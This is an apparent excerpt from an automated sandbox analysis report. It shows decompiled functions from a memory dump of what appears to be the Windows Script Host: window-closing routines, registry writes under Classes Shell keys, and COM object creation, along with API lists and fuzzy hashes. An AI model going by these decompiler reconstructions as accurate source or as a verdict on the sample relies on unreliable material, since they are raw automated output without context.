                                                        • Opcode Fuzzy Hash: a4fc3f0c8513f56c146f10abfea46bc584a43a94cd7c753486a0b4997bc0db99
                                                        • Instruction Fuzzy Hash: CC110976201B06DFCB24AF65D988916BBE9FF88311714499CE456D7620CB71E942CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B8FC81, Relevance: 6.0, APIs: 4, Instructions: 41windowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00B8FC81(struct HWND__* _a4, intOrPtr* _a8) {
				struct HWND__* _t11;
				struct HWND__* _t13;

				_t11 = _a4;
				if(IsWindowVisible(_t11) != 0) {
					_t13 = _t11;
					if(_t11 == 0) {
						L4:
						PostMessageA(_t11, 0x10, 0, 0);
						PostMessageA(_t11, 0x100, 0xd, 0);
						 *_a8 =  *_a8 + 1;
					} else {
						while(E00B8FBD9(_t13) == 0) {
							_t13 = GetParent(_t13);
							if(_t13 != 0) {
								continue;
							} else {
								goto L4;
							}
							goto L5;
						}
					}
					L5:
				}
				return 1;
			}





                                                        0x00b8fc87
                                                        0x00b8fc93
                                                        0x00b8fc96
                                                        0x00b8fc9a
                                                        0x00b8fcb3
                                                        0x00b8fcc0
                                                        0x00b8fccc
                                                        0x00b8fcd1
                                                        0x00000000
                                                        0x00b8fc9c
                                                        0x00b8fcad
                                                        0x00b8fcb1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00b8fcb1
                                                        0x00b8fc9c
                                                        0x00b8fcd3
                                                        0x00b8fcd3
                                                        0x00b8fcd9

                                                        APIs
                                                        • IsWindowVisible.USER32(?), ref: 00B8FC8B
                                                        • GetParent.USER32(?), ref: 00B8FCA7
                                                        • PostMessageA.USER32(?,00000010,00000000,00000000), ref: 00B8FCC0
                                                        • PostMessageA.USER32(?,00000100,0000000D,00000000), ref: 00B8FCCC
                                                          • Part of subcall function 00B8FBD9: GetClassNameA.USER32(?,?,00000005), ref: 00B8FBF5
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: MessagePost$ClassNameParentVisibleWindow
                                                        • String ID:
                                                        • API String ID: 1155528767-0
                                                        • Opcode ID: c5d0c99d273243eca93232bf8b7a800e90711a3d6577cf71657ddeab7ebc014b
                                                        • Instruction ID: 91a6c7fc5985c19698be93892ad5c007285f0f780ea11693711b51659ac8a9dd
                                                        • Opcode Fuzzy Hash: c5d0c99d273243eca93232bf8b7a800e90711a3d6577cf71657ddeab7ebc014b
                                                        • Instruction Fuzzy Hash: FBF0B43264161A37D7227A189C01FBA37ACDB85B60F050062FD00F71A0CBA0A902CBA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B8F764, Relevance: 6.0, APIs: 4, Instructions: 35registrystringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00B8F764(void* _a4, void* _a8, char* _a12, char* _a16) {
				int _t16;
				int _t19;

				_t16 = RegOpenKeyExA(_a4, _a8, 0, 0x20006,  &_a8);
				if(_t16 == 0) {
					_t16 = RegSetValueExA(_a8, _a12, _t16, 1, _a16, lstrlenA(_a16) + 1);
					RegCloseKey(_a8);
					_t19 = _t16;
				}
				if(_t19 > 0) {
					_t16 = _t16 & 0x0000ffff | 0x80070000;
				}
				return _t16;
			}





                                                        0x00b8f781
                                                        0x00b8f785
                                                        0x00b8f7a7
                                                        0x00b8f7a9
                                                        0x00b8f7af
                                                        0x00b8f7af
                                                        0x00b8f7b1
                                                        0x00b8f7b9
                                                        0x00b8f7b9
                                                        0x00b8f7c3

                                                        APIs
                                                        • RegOpenKeyExA.ADVAPI32(?,00B8FB79,00000000,00020006,00B8FB79), ref: 00B8F77B
                                                        • lstrlenA.KERNEL32(?,?,00B8F9CB,00000000,Shell,00B89B44,00B8FBBC,?,?,00B8FB79,WSFFile,00000000), ref: 00B8F78A
                                                        • RegSetValueExA.ADVAPI32(00B8FB79,?,00000000,00000001,?,00000001), ref: 00B8F79E
                                                        • RegCloseKey.ADVAPI32(00B8FB79), ref: 00B8F7A9
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: CloseOpenValuelstrlen
                                                        • String ID:
                                                        • API String ID: 2964171075-0
                                                        • Opcode ID: 037c0f4d67c9b63fc2d4696e95b8952d0cbf28f65b4430f733d28f4075ff5604
                                                        • Instruction ID: 03607b1713a92f5f2afa10446b612bae8a08b9ae2b833f331a878e34ef04e001
                                                        • Opcode Fuzzy Hash: 037c0f4d67c9b63fc2d4696e95b8952d0cbf28f65b4430f733d28f4075ff5604
                                                        • Instruction Fuzzy Hash: 40F01D37941129BBDF221F94EC04BAA3B6AEF047A1F018520FE15EA170CA728D21DB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B83C66, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 71%
                                                        			E00B83C66(intOrPtr* __ecx, char __edx, intOrPtr __edi) {
				signed int _v8;
				char _v528;
				signed int _v532;
				void* __ebx;
				void* __esi;
				signed int _t23;
				intOrPtr* _t30;
				intOrPtr* _t45;
				short* _t49;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr _t59;
				intOrPtr _t62;
				long _t66;
				intOrPtr* _t67;
				signed int _t68;
				void* _t69;
				void* _t71;

				_t64 = __edi;
				_t58 = __edx;
				_t23 =  *0xb97004; // 0xbb40e64e
				_v8 = _t23 ^ _t68;
				_t67 = __ecx;
				_t49 = __ecx + 0x1c;
				 *_t49 = 0;
				if(E00B83752(__ecx) < 0) {
					L7:
					return E00B81335(_t26, _t49, _v8 ^ _t68, _t58, _t64, _t67);
				}
				if( *((intOrPtr*)(_t67 + 0x224)) == 0) {
					_t26 = 0;
					goto L7;
				}
				_push(__edi);
				if(lstrlenW( *( *(_t67 + 0x228))) >= 0x104) {
					_push(_t49);
					_push(0xcef);
					L20:
					_t59 =  *0xb9702c; // 0x0
					_t30 =  *0xb97010; // 0x0
					_t58 = _t59 + 0x15;
					__eflags = _t58;
					 *((intOrPtr*)( *_t30 + 0x10))(_t30, _t58);
					L21:
					_t26 = 0x8004ffff;
					L6:
					_pop(_t64);
					goto L7;
				}
				E00B831BD(_t49, 0x104,  *( *(_t67 + 0x228)));
				_t71 = _t69 + 0xc;
				if(E00B83D0D(_t49, 0x2e) == 0 || E00B82753(_t34 + 2, ?str?, 0xffffffff) != 0) {
					L5:
					_t26 = 0;
					goto L6;
				} else {
					E00B831BD( &_v528, 0x104, _t49);
					_t69 = _t71 + 0xc;
					_t66 = E00B8F1E9(_t67, _t58, __eflags,  &_v528);
					__eflags = _t66;
					if(_t66 >= 0) {
						__eflags = _t66 - 1;
						if(_t66 != 1) {
							goto L5;
						}
						__eflags =  *((char*)(_t67 + 6));
						if( *((char*)(_t67 + 6)) != 0) {
							_t55 =  *0xb97010; // 0x0
							 *((intOrPtr*)( *_t55 + 8))();
						}
						_push( &_v528);
						_push(0xd48);
						goto L20;
					}
					__eflags =  *((char*)(_t67 + 6));
					if( *((char*)(_t67 + 6)) != 0) {
						_t57 =  *0xb97010; // 0x0
						 *((intOrPtr*)( *_t57 + 8))();
					}
					__eflags = _t66 - 0x80070002;
					if(_t66 != 0x80070002) {
						_v532 = _v532 & 0x00000000;
						E00B8F3F0(_t66,  &_v532);
						_t45 =  *0xb97010; // 0x0
						_t62 =  *0xb9702c; // 0x0
						_t58 = _t62 + 0x14;
						 *((intOrPtr*)( *_t45 + 0x10))(_t45, _t62 + 0x14, 0xc84,  &_v528, _v532);
						__imp__#6(_v532);
						goto L21;
					} else {
						_push( &_v528);
						_push(0xcee);
						goto L20;
					}
				}
			}





















                                                        0x00b83c66
                                                        0x00b83c66
                                                        0x00b83c71
                                                        0x00b83c78
                                                        0x00b83c7d
                                                        0x00b83c81
                                                        0x00b83c84
                                                        0x00b83c8e
                                                        0x00b83cf2
                                                        0x00b83cff
                                                        0x00b83cff
                                                        0x00b83c97
                                                        0x00b87c5c
                                                        0x00000000
                                                        0x00b87c5c
                                                        0x00b83ca3
                                                        0x00b83cb3
                                                        0x00b87c63
                                                        0x00b87c64
                                                        0x00b87d2c
                                                        0x00b87d2c
                                                        0x00b87d32
                                                        0x00b87d39
                                                        0x00b87d39
                                                        0x00b87d3e
                                                        0x00b87d44
                                                        0x00b87d44
                                                        0x00b83cf1
                                                        0x00b83cf1
                                                        0x00000000
                                                        0x00b83cf1
                                                        0x00b83cc3
                                                        0x00b83cc8
                                                        0x00b83cd5
                                                        0x00b83cef
                                                        0x00b83cef
                                                        0x00000000
                                                        0x00b87c6e
                                                        0x00b87c77
                                                        0x00b87c7c
                                                        0x00b87c8d
                                                        0x00b87c8f
                                                        0x00b87c91
                                                        0x00b87d06
                                                        0x00b87d09
                                                        0x00000000
                                                        0x00000000
                                                        0x00b87d0f
                                                        0x00b87d13
                                                        0x00b87d15
                                                        0x00b87d1d
                                                        0x00b87d1d
                                                        0x00b87d26
                                                        0x00b87d27
                                                        0x00000000
                                                        0x00b87d27
                                                        0x00b87c93
                                                        0x00b87c97
                                                        0x00b87c99
                                                        0x00b87ca1
                                                        0x00b87ca1
                                                        0x00b87ca4
                                                        0x00b87caa
                                                        0x00b87cba
                                                        0x00b87cc9
                                                        0x00b87cd4
                                                        0x00b87ce2
                                                        0x00b87ced
                                                        0x00b87cf2
                                                        0x00b87cfe
                                                        0x00000000
                                                        0x00b87cac
                                                        0x00b87cb2
                                                        0x00b87cb3
                                                        0x00000000
                                                        0x00b87cb3
                                                        0x00b87caa

                                                        APIs
                                                        • lstrlenW.KERNEL32(?,80000001,00B8220C,00000000), ref: 00B83CA6
                                                          • Part of subcall function 00B82753: lstrlenW.KERNEL32(?,00000000,?,?,?,00B86DCF,00000000,.wsf,000000FF,?,0000002E), ref: 00B8276A
                                                          • Part of subcall function 00B82753: lstrlenW.KERNEL32(?,?,?,?,00B86DCF,00000000,.wsf,000000FF,?,0000002E), ref: 00B82771
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: lstrlen
                                                        • String ID: WSH
                                                        • API String ID: 1659193697-2133009938
                                                        • Opcode ID: c38fd98a3358486a0de6e8ba5b006f6500678a9e7452cb25ab9a0268dfe53e72
                                                        • Instruction ID: f8a49be186f7fd86163b409fc8b1efcf24c62bc4e56e1cbe1447406d756114f5
                                                        • Opcode Fuzzy Hash: c38fd98a3358486a0de6e8ba5b006f6500678a9e7452cb25ab9a0268dfe53e72
                                                        • Instruction Fuzzy Hash: 6B41B1B1544204ABDB20EB64CC89FAA77F9EF84B04F2049EAE41597271DE70DE45CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B841AC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 84%
                                                        			E00B841AC(short* __ecx, void* __eflags, intOrPtr _a4, int _a8) {
				signed int _v8;
				char _v2084;
				void* _v2088;
				intOrPtr _v2092;
				short* _v2096;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t18;
				intOrPtr _t32;
				intOrPtr _t38;
				signed int _t41;

				_t18 =  *0xb97004; // 0xbb40e64e
				_v8 = _t18 ^ _t41;
				_v2096 = __ecx;
				_t40 = 0x80000000;
				if(E00B83415( &_v2088, _t38, 0x80000000, _a4, 0x20019,  &_v2088) < 0) {
					L6:
					return E00B81335(_t21, _t32, _v8 ^ _t41, _t38, 0x20019, _t40);
				}
				_push(_t32);
				_v2092 = E00B842B5(_v2088, 0,  &_v2084, 0x400);
				RegCloseKey(_v2088);
				_t21 = _v2092;
				if(_v2092 >= 0) {
					E00B836CD( &_v2084, 0x40e, L"\\ScriptEngine");
					if(E00B83415( &_v2088, _t38, 0x80000000,  &_v2084, 0x20019,  &_v2088) >= 0) {
						_t40 = E00B842B5(_v2088, 0, _v2096, _a8);
						RegCloseKey(_v2088);
						if(_t40 < 0) {
							_t21 = _t40;
						} else {
							_t21 = 0;
						}
					}
				}
				_pop(_t32);
				goto L6;
			}















                                                        0x00b841b7
                                                        0x00b841be
                                                        0x00b841c6
                                                        0x00b841da
                                                        0x00b841e7
                                                        0x00b84282
                                                        0x00b8428f
                                                        0x00b8428f
                                                        0x00b841ed
                                                        0x00b84213
                                                        0x00b84219
                                                        0x00b8421b
                                                        0x00b84223
                                                        0x00b84236
                                                        0x00b84255
                                                        0x00b84273
                                                        0x00b84275
                                                        0x00b84279
                                                        0x00b88854
                                                        0x00b8427f
                                                        0x00b8427f
                                                        0x00b8427f
                                                        0x00b84279
                                                        0x00b84255
                                                        0x00b84281
                                                        0x00000000

                                                        APIs
                                                          • Part of subcall function 00B83415: RegOpenKeyExW.ADVAPI32 ref: 00B83444
                                                          • Part of subcall function 00B842B5: RegQueryValueExW.ADVAPI32(74BA46CE,?,00000000,?,00020019,74BA46CE), ref: 00B8430C
                                                        • RegCloseKey.ADVAPI32(?), ref: 00B84219
                                                        • RegCloseKey.ADVAPI32(?), ref: 00B84275
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: Close$OpenQueryValue
                                                        • String ID: \ScriptEngine
                                                        • API String ID: 1607946009-4133095719
                                                        • Opcode ID: e70b23a05f820d5784d3718256a517af9d8f174af8f4bd70793e76c184ad1db2
                                                        • Instruction ID: dc0de4d3beccc09333b667da70f17763109acf76db9ffd29f0423605edf40b4a
                                                        • Opcode Fuzzy Hash: e70b23a05f820d5784d3718256a517af9d8f174af8f4bd70793e76c184ad1db2
                                                        • Instruction Fuzzy Hash: 8D213E71914118ABDB21AE699D81FAEB7F8BB08710F0440E5B948E2260DA31DE45CFE4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B86B08, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00B86B08(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a16, short* _a20) {
				void* _t14;
				struct HWND__* _t15;
				void* _t21;
				short _t23;
				intOrPtr* _t26;
				short* _t29;
				short* _t30;
				intOrPtr* _t32;

				_t14 = _a8 - 1;
				if(_t14 == 0) {
					_t15 = GetActiveWindow();
					_t29 = _a20;
					 *(_t29 + 8) = _t15;
					 *_t29 = 0x4000;
					L7:
					return 0;
				}
				if(_t14 != 1) {
					return 0x80004001;
				}
				_t32 = _a16;
				if(_t32 == 0) {
					L9:
					return 0x80004005;
				}
				_t21 = 8;
				if(_t21 !=  *_t32 || E00B82753( *((intOrPtr*)(_t32 + 8)), L"WScript", 0xffffffff) != 0 && E00B82753( *((intOrPtr*)(_t32 + 8)), L"WSH", 0xffffffff) != 0) {
					goto L9;
				} else {
					_t30 = _a20;
					_t23 = 9;
					 *_t30 = _t23;
					_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10)) + 0x240));
					 *((intOrPtr*)(_t30 + 8)) = _t26;
					 *((intOrPtr*)( *_t26 + 4))(_t26);
					goto L7;
				}
			}











                                                        0x00b86b10
                                                        0x00b86b12
                                                        0x00b890a2
                                                        0x00b890a8
                                                        0x00b890ab
                                                        0x00b890b3
                                                        0x00b86b72
                                                        0x00000000
                                                        0x00b86b72
                                                        0x00b86b19
                                                        0x00000000
                                                        0x00b89098
                                                        0x00b86b1f
                                                        0x00b86b24
                                                        0x00b86b79
                                                        0x00000000
                                                        0x00b86b79
                                                        0x00b86b28
                                                        0x00b86b2c
                                                        0x00000000
                                                        0x00b86b54
                                                        0x00b86b54
                                                        0x00b86b59
                                                        0x00b86b5a
                                                        0x00b86b63
                                                        0x00b86b69
                                                        0x00b86b6f
                                                        0x00000000
                                                        0x00b86b6f

                                                        APIs
                                                        • GetActiveWindow.USER32 ref: 00B890A2
                                                          • Part of subcall function 00B82753: lstrlenW.KERNEL32(?,00000000,?,?,?,00B86DCF,00000000,.wsf,000000FF,?,0000002E), ref: 00B8276A
                                                          • Part of subcall function 00B82753: lstrlenW.KERNEL32(?,?,?,?,00B86DCF,00000000,.wsf,000000FF,?,0000002E), ref: 00B82771
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: lstrlen$ActiveWindow
                                                        • String ID: WSH$WScript
                                                        • API String ID: 1657113941-1019903269
                                                        • Opcode ID: 18bc2c6fc0eaa138eb2a010ef433b2e50c3ed6d7e8dce4538a89b2c7500e72ff
                                                        • Instruction ID: fbe5e1a28ada7a73629864dd10b94da222dcd8aff5176cd46c91922f3f4b08c7
                                                        • Opcode Fuzzy Hash: 18bc2c6fc0eaa138eb2a010ef433b2e50c3ed6d7e8dce4538a89b2c7500e72ff
                                                        • Instruction Fuzzy Hash: 32116935204305EFCB14FF69D842E6577E4EF05728B248599F929EB2B0D632DC82C790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B82B81, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CLSIDFromProgID.OLE32(?,?), ref: 00B82B8D
                                                        • CoCreateInstance.OLE32(?,00000000,00000015,00B815B8,?), ref: 00B82BAC
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: CreateFromInstanceProg
                                                        • String ID: WScript.CreateObject
                                                        • API String ID: 2151042543-1366894974
                                                        • Opcode ID: 2d2d974bebe8b3c89a3429782d11875218df8827a47223013b4cf08fbf697d00
                                                        • Instruction ID: 65a77f3accb2572cc8a1d17c1f9218824d6e5ef8455e0ba088f49f52a3656219
                                                        • Opcode Fuzzy Hash: 2d2d974bebe8b3c89a3429782d11875218df8827a47223013b4cf08fbf697d00
                                                        • Instruction Fuzzy Hash: 6501D436681219BBDB113F489C02EE93BDADB04B50F0449E0FE057A1B2DA61D911D7D1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00B8F8BF, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45registryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 85%
                                                        			E00B8F8BF(intOrPtr __ebx, intOrPtr __edx, char* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v268;
				void* _v272;
				void* __esi;
				signed int _t9;
				intOrPtr _t13;
				intOrPtr _t18;
				intOrPtr _t22;
				intOrPtr _t25;
				signed int _t28;

				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_t9 =  *0xb97004; // 0xbb40e64e
				_v8 = _t9 ^ _t28;
				_push("Shell");
				_t13 = E00B8F861( &_v268, 0x104, "SOFTWARE\\Classes\\%s\\%s", _a4);
				_t27 = _t13;
				if(_t13 >= 0) {
					_t18 = E00B8F813(0x80000001,  &_v268,  &_v272);
					_t27 = _t18;
					if(_t18 >= 0) {
						_t27 = E00B8F764(_v272, 0xb89b44, 0xb89b44, __edi);
						RegCloseKey(_v272);
					}
				}
				return E00B81335(_t27, _t22, _v8 ^ _t28, _t25, _t26, _t27);
			}













                                                        0x00b8f8bf
                                                        0x00b8f8bf
                                                        0x00b8f8bf
                                                        0x00b8f8ca
                                                        0x00b8f8d1
                                                        0x00b8f8d8
                                                        0x00b8f8ef
                                                        0x00b8f8f4
                                                        0x00b8f8fb
                                                        0x00b8f910
                                                        0x00b8f915
                                                        0x00b8f919
                                                        0x00b8f934
                                                        0x00b8f936
                                                        0x00b8f936
                                                        0x00b8f919
                                                        0x00b8f94a

                                                        APIs
                                                          • Part of subcall function 00B8F861: _vsnprintf.MSVCRT ref: 00B8F894
                                                          • Part of subcall function 00B8F813: RegOpenKeyExA.ADVAPI32(?,80000001,00000000,00020006,00B8F915), ref: 00B8F82A
                                                          • Part of subcall function 00B8F813: RegCreateKeyA.ADVAPI32(?,80000001,00B8F915), ref: 00B8F83D
                                                          • Part of subcall function 00B8F764: RegOpenKeyExA.ADVAPI32(?,00B8FB79,00000000,00020006,00B8FB79), ref: 00B8F77B
                                                          • Part of subcall function 00B8F764: lstrlenA.KERNEL32(?,?,00B8F9CB,00000000,Shell,00B89B44,00B8FBBC,?,?,00B8FB79,WSFFile,00000000), ref: 00B8F78A
                                                          • Part of subcall function 00B8F764: RegSetValueExA.ADVAPI32(00B8FB79,?,00000000,00000001,?,00000001), ref: 00B8F79E
                                                          • Part of subcall function 00B8F764: RegCloseKey.ADVAPI32(00B8FB79), ref: 00B8F7A9
                                                        • RegCloseKey.ADVAPI32(?), ref: 00B8F936
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.687768128.0000000000B80000.00000040.00020000.sdmp, Offset: 00B80000, based on PE: true
                                                        Similarity
                                                        • API ID: CloseOpen$CreateValue_vsnprintflstrlen
                                                        • String ID: SOFTWARE\Classes\%s\%s$Shell
                                                        • API String ID: 1550461982-2614410927
                                                        • Opcode ID: e6e7b76dea49d55ef42a1b43f3911f27e0e975f5266a5743c02736c4ce171be1
                                                        • Instruction ID: 5edba3dc9a72df51a937f1b4de79004495afaf5852c2cd46b23eda32f8c6c24c
                                                        • Opcode Fuzzy Hash: e6e7b76dea49d55ef42a1b43f3911f27e0e975f5266a5743c02736c4ce171be1
                                                        • Instruction Fuzzy Hash: A1014F76901129BBCB10BBA49C05EEAB7EC9B55710F0001E1F944E7261DAB4DE80CBE4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%